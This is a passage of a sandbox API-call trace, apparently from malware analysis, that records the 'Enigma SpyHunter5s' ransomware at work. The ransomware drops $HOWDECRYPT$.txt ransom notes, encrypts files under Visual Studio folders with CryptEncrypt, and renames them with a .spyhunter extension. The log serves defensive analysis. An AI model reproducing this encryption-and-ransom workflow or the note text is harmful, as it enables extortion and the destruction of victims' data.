dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0164.585] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.585] WriteFile (in: hFile=0x178, lpBuffer=0x270e647*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e770, lpOverlapped=0x0 | out: lpBuffer=0x270e647*, lpNumberOfBytesWritten=0x270e770*=0x127, lpOverlapped=0x0) returned 1 [0164.586] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.586] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e770, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e770*=0x2ac, lpOverlapped=0x0) returned 1 [0164.586] CloseHandle (hObject=0x178) returned 1 [0164.586] GetProcessHeap () returned 0x2c0000 [0164.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eceec0 | out: hHeap=0x2c0000) returned 1 [0164.586] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e710 | out: pbBuffer=0x270e710) returned 1 [0164.586] GetProcessHeap () returned 0x2c0000 [0164.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0164.586] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e708*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e708*=0x30) returned 1 [0164.586] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAProjectUI.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaprojectui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0164.587] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAProjectUI.dll") returned 84 [0164.587] StrStrW (lpFirst="VSTAProjectUI.dll", lpSrch=".txt") returned 0x0 [0164.587] GetProcessHeap () returned 0x2c0000 [0164.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0164.587] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e6cc*=0x2800, lpOverlapped=0x0) returned 1 [0164.602] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.602] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e6cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e6cc*=0x2800, lpOverlapped=0x0) returned 1 [0164.602] GetProcessHeap () returned 0x2c0000 [0164.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0164.602] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.602] WriteFile (in: hFile=0x178, lpBuffer=0x270e70c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e6cc, lpOverlapped=0x0 | out: lpBuffer=0x270e70c*, lpNumberOfBytesWritten=0x270e6cc*=0x4, lpOverlapped=0x0) returned 1 [0164.679] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e6cc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e6cc*=0x30, lpOverlapped=0x0) returned 1 [0164.679] CloseHandle (hObject=0x178) returned 1 [0164.692] GetProcessHeap () returned 0x2c0000 [0164.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.692] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAProjectUI.dll.spyhunter") returned 94 [0164.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAProjectUI.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaprojectui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\VSTAProjectUI.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\vstaprojectui.dll.spyhunter")) returned 1 [0164.693] GetProcessHeap () returned 0x2c0000 [0164.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.693] GetProcessHeap () returned 0x2c0000 [0164.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0164.693] GetProcessHeap () returned 0x2c0000 [0164.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecaf50 | out: hHeap=0x2c0000) returned 1 [0164.693] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0164.835] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.835] WriteFile (in: hFile=0xa0, lpBuffer=0x270e63f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e768, lpOverlapped=0x0 | out: lpBuffer=0x270e63f*, lpNumberOfBytesWritten=0x270e768*=0x127, lpOverlapped=0x0) returned 1 [0164.836] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.836] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e768, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e768*=0x2ac, lpOverlapped=0x0) returned 1 [0164.836] CloseHandle (hObject=0xa0) returned 1 [0164.837] GetProcessHeap () returned 0x2c0000 [0164.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecac68 | out: hHeap=0x2c0000) returned 1 [0164.837] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0164.870] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.870] WriteFile (in: hFile=0x9c, lpBuffer=0x270e63b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e764, lpOverlapped=0x0 | out: lpBuffer=0x270e63b*, lpNumberOfBytesWritten=0x270e764*=0x127, lpOverlapped=0x0) returned 1 [0164.871] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.871] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e764, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e764*=0x2ac, lpOverlapped=0x0) returned 1 [0164.871] CloseHandle (hObject=0x9c) returned 1 [0164.933] GetProcessHeap () returned 0x2c0000 [0164.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e88678 | out: hHeap=0x2c0000) returned 1 [0164.933] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e700 | out: pbBuffer=0x270e700) returned 1 [0164.933] GetProcessHeap () returned 0x2c0000 [0164.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0164.934] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6f8*=0x30) returned 1 [0164.934] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\resourceinternal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0164.937] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip") returned 121 [0164.937] StrStrW (lpFirst="ResourceInternal.zip", lpSrch=".txt") returned 0x0 [0164.937] GetProcessHeap () returned 0x2c0000 [0164.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0164.938] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e6bc*=0x89b, lpOverlapped=0x0) returned 1 [0165.052] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff765, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.052] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x89b, lpNumberOfBytesWritten=0x270e6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e6bc*=0x89b, lpOverlapped=0x0) returned 1 [0165.053] GetProcessHeap () returned 0x2c0000 [0165.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0165.053] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.053] WriteFile (in: hFile=0xb0, lpBuffer=0x270e6fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e6bc, lpOverlapped=0x0 | out: lpBuffer=0x270e6fc*, lpNumberOfBytesWritten=0x270e6bc*=0x4, lpOverlapped=0x0) returned 1 [0165.053] WriteFile (in: hFile=0xb0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e6bc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e6bc*=0x30, lpOverlapped=0x0) returned 1 [0165.053] CloseHandle (hObject=0xb0) returned 1 [0165.053] GetProcessHeap () returned 0x2c0000 [0165.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0165.053] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip.spyhunter") returned 131 [0165.053] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\resourceinternal.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\resourceinternal.zip.spyhunter")) returned 1 [0165.055] GetProcessHeap () returned 0x2c0000 [0165.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0165.055] GetProcessHeap () returned 0x2c0000 [0165.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0165.055] GetProcessHeap () returned 0x2c0000 [0165.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3b2f8 | out: hHeap=0x2c0000) returned 1 [0165.055] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e700 | out: pbBuffer=0x270e700) returned 1 [0165.055] GetProcessHeap () returned 0x2c0000 [0165.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0165.055] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6f8*=0x30) returned 1 [0165.055] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\LoginForm.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\loginform.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0165.056] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\LoginForm.zip") returned 114 [0165.056] StrStrW (lpFirst="LoginForm.zip", lpSrch=".txt") returned 0x0 [0165.056] GetProcessHeap () returned 0x2c0000 [0165.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0165.056] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e6bc*=0x2800, lpOverlapped=0x0) returned 1 [0165.140] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.140] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e6bc*=0x2800, lpOverlapped=0x0) returned 1 [0165.140] GetProcessHeap () returned 0x2c0000 [0165.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0165.140] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.140] WriteFile (in: hFile=0xb0, lpBuffer=0x270e6fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e6bc, lpOverlapped=0x0 | out: lpBuffer=0x270e6fc*, lpNumberOfBytesWritten=0x270e6bc*=0x4, lpOverlapped=0x0) returned 1 [0165.320] WriteFile (in: hFile=0xb0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e6bc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e6bc*=0x30, lpOverlapped=0x0) returned 1 [0165.320] CloseHandle (hObject=0xb0) returned 1 [0165.483] GetProcessHeap () returned 0x2c0000 [0165.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0165.484] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\LoginForm.zip.spyhunter") returned 124 [0165.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\LoginForm.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\loginform.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\LoginForm.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\loginform.zip.spyhunter")) returned 1 [0165.485] GetProcessHeap () returned 0x2c0000 [0165.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0165.485] GetProcessHeap () returned 0x2c0000 [0165.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0165.485] GetProcessHeap () returned 0x2c0000 [0165.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e88198 | out: hHeap=0x2c0000) returned 1 [0165.485] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6f8 | out: pbBuffer=0x270e6f8) returned 1 [0165.485] GetProcessHeap () returned 0x2c0000 [0165.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0165.486] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6f0*=0x30) returned 1 [0165.486] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\visualizer.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0165.565] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip") returned 110 [0165.565] StrStrW (lpFirst="Visualizer.zip", lpSrch=".txt") returned 0x0 [0165.565] GetProcessHeap () returned 0x2c0000 [0165.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0165.566] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e6b4*=0x558, lpOverlapped=0x0) returned 1 [0165.689] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffaa8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.689] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x270e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e6b4*=0x558, lpOverlapped=0x0) returned 1 [0165.689] GetProcessHeap () returned 0x2c0000 [0165.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0165.689] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.689] WriteFile (in: hFile=0x9c, lpBuffer=0x270e6f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e6b4, lpOverlapped=0x0 | out: lpBuffer=0x270e6f4*, lpNumberOfBytesWritten=0x270e6b4*=0x4, lpOverlapped=0x0) returned 1 [0165.689] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e6b4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e6b4*=0x30, lpOverlapped=0x0) returned 1 [0165.689] CloseHandle (hObject=0x9c) returned 1 [0165.689] GetProcessHeap () returned 0x2c0000 [0165.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.690] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip.spyhunter") returned 120 [0165.690] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\visualizer.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\visualizer.zip.spyhunter")) returned 1 [0165.690] GetProcessHeap () returned 0x2c0000 [0165.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.690] GetProcessHeap () returned 0x2c0000 [0165.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0165.691] GetProcessHeap () returned 0x2c0000 [0165.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eac058 | out: hHeap=0x2c0000) returned 1 [0165.691] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6f8 | out: pbBuffer=0x270e6f8) returned 1 [0165.691] GetProcessHeap () returned 0x2c0000 [0165.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0165.691] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6f0*=0x30) returned 1 [0165.691] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resourceinternal.zip"), dwDesiredAccess=0xc0000000, 